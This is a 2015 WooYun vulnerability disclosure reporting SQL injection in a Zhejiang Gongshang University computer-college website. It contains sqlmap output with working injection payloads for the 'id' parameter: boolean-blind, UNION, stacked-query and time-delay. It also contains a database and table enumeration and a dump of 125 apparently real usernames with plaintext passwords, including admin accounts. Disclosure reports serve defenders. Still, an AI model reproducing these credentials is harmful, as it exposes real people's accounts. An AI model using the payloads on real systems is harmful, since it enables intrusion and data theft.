当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153544

漏洞标题:浙江工商大学存在sql注入漏洞,表儿多的我都数不清了

相关厂商:CCERT教育网应急响应组

漏洞作者: 喵星人不会飞

提交时间:2015-11-11 16:07

修复时间:2015-11-24 13:00

公开时间:2015-11-24 13:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

计算机学院的洞,好吧。表太多了,自己确认下有没有核心数据吧

详细说明:

http://**.**.**.**/ciecol/web/kcjs_detail.jsp?id=28


漏洞证明:

sqlmap identified the following injection points with a total of 56 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=131 AND 5029=5029
    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: id=-7999 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(83)+CHAR(107)+CHAR(108)+CHAR(67)+CHAR(73)+CHAR(98)+CHAR(109)+CHAR(105)+CHAR(115)+CHAR(81)+CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113),NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=131; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=131 WAITFOR DELAY '0:0:5'--
---
web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] ciedb
[*] jxxy
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
Database: ciedb
[49 tables]
+-------------------+
| AdminACL          |
| AdminACL          |
| Dyml              |
| Ejml              |
| Xsml              |
| Yjml              |
| Zc                |
| bgnw_jxdg         |
| bgnw_jxjh         |
| bgnw_xqrw         |
| bkjx_kcjs         |
| bkjx_zyjs         |
| candidate         |
| courseinfor       |
| cybgxztype        |
| deptinfor         |
| dlxt              |
| dtproperties      |
| infolink          |
| infolink          |
| js_xwd_map        |
| jsfc_temp2        |
| jsfc_temp2        |
| jsfc_temp3        |
| lxwm              |
| notice            |
| question          |
| record            |
| result            |
| studentinfor      |
| subjectinfor      |
| sysconstraints    |
| syssegments       |
| systeminfor       |
| t_jiaozhu         |
| teacherlogin      |
| userinfor_teacher |
| userinfor_teacher |
| voteresult        |
| xkky_zdxk         |
| xygk_jsfc         |
| xygk_xrld         |
| xygk_xyjj         |
| xyjg              |
| xyldmail          |
| yjs_xwd           |
| yqlj              |
| zwdy              |
| zwdy              |
+-------------------+


web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
Database: jxxy
Table: Users
[9 columns]
+---------------------+------------------+
| Column              | Type             |
+---------------------+------------------+
| answer              | varchar          |
| ID                  | int              |
| msrepl_tran_version | uniqueidentifier |
| note                | varchar          |
| password            | varchar          |
| privilege           | varchar          |
| question            | varchar          |
| type                | int              |
| username            | varchar          |
+---------------------+------------------+


web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
Database: jxxy
Table: Users
[125 entries]
+----------+-------------+
| username | password    |
+----------+-------------+
| 1201300  | .3698741025 |
| 1216600  | 040206      |
| 1216700  | 09158579    |
| 1217100  | 1103087     |
| 1200100  | 1200100     |
| 1200200  | 1200200     |
| 1200300  | 1200300     |
| 1200400  | 1200400     |
| 1200700  | 1200700     |
| 1200900  | 1200900     |
| 1201000  | 1201000     |
| 1201100  | 1201100     |
| 1201200  | 1201200     |
| 1201600  | 1201600     |
| 1201800  | 1201800     |
| 1202100  | 1202100     |
| 1202400  | 1202400     |
| 1202500  | 1202500     |
| 1202600  | 1202600     |
| 1202800  | 1202800     |
| 1203000  | 1203000     |
| 1203200  | 1203200     |
| 1203300  | 1203300     |
| 1203400  | 1203400     |
| 1203500  | 1203500     |
| 1203600  | 1203600     |
| 1203700  | 1203700     |
| 1203800  | 1203800     |
| 1203900  | 1203900     |
| 1204400  | 1204400     |
| 1204700  | 1204700     |
| 1204800  | 1204800     |
| 1204900  | 1204900     |
| 1205000  | 1205000     |
| 1205100  | 1205100     |
| 1205200  | 1205200     |
| 1205300  | 1205300     |
| 1205400  | 1205400     |
| 1205600  | 1205600     |
| 1205700  | 1205700     |
| 1205800  | 1205800     |
| 1206000  | 1206000     |
| 1206500  | 1206500     |
| 1206600  | 1206600     |
| 1206700  | 1206700     |
| 1206900  | 1206900     |
| 1207100  | 1207100     |
| 1207300  | 1207300     |
| 1207400  | 1207400     |
| 1207600  | 1207600     |
| 1207700  | 1207700     |
| 1207800  | 1207800     |
| 1207900  | 1207900     |
| 1208000  | 1208000     |
| 1208100  | 1208100     |
| 1208400  | 1208400     |
| 1208500  | 1208500     |
| 1208800  | 1208800     |
| 1208900  | 1208900     |
| 1209200  | 1209200     |
| 1209300  | 1209300     |
| 1209400  | 1209400     |
| 1209500  | 1209500     |
| 1209600  | 1209600     |
| 1209800  | 1209800     |
| 1209900  | 1209900     |
| 1210000  | 1210000     |
| 1210100  | 1210100     |
| 1210200  | 1210200     |
| 1210300  | 1210300     |
| 1210400  | 1210400     |
| 1210500  | 1210500     |
| 1210800  | 1210800     |
| 1210900  | 1210900     |
| 1211000  | 1211000     |
| 1211100  | 1211100     |
| 1211200  | 1211200     |
| 1211300  | 1211300     |
| 1211800  | 1211800     |
| 1211900  | 1211900     |
| 1212000  | 1212000     |
| 1212200  | 1212200     |
| 1212300  | 1212300     |
| 1212400  | 1212400     |
| 1212900  | 1212900     |
| 1213000  | 1213000     |
| 1213100  | 1213100     |
| 1213300  | 1213300     |
| 1213400  | 1213400     |
| 1213500  | 1213500     |
| 1213600  | 1213600     |
| 1213700  | 1213700     |
| 1213800  | 1213800     |
| 1213900  | 1213900     |
| 1214000  | 1214000     |
| 1214100  | 1214100     |
| 1214300  | 1214300     |
| 1214600  | 1214600     |
| 1214700  | 1214700     |
| 1214800  | 1214800     |
| 1215100  | 1215100     |
| 1215200  | 1215200     |
| 1216100  | 1216100     |
| 1216200  | 1216200     |
| 1216400  | 1216400     |
| 1216800  | 1216800     |
| 1216900  | 1216900     |
| 1214400  | 198343      |
| 2505200  | 2505200     |
| 2506400  | 2506400     |
| admin3   | 28008309    |
| 1212700  | 301110      |
| 1213200  | 51life      |
| 1201900  | 611511      |
| 1203100  | 626311      |
| 1202300  | 717102      |
| 1215300  | 790406      |
| 1204500  | 826631      |
| admin2   | admin2      |
| admin5   | admin5      |
| 1216300  | arealman    |
| chen     | chen        |
| 1214500  | dg0615015   |
| 1216000  | enose173    |
| 1217000  | p801130     |
+----------+-------------+


修复方案:

过滤

版权声明:转载请注明来源 喵星人不会飞@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-24 13:00

厂商回复:

最新状态:

暂无

漏洞评价:

评价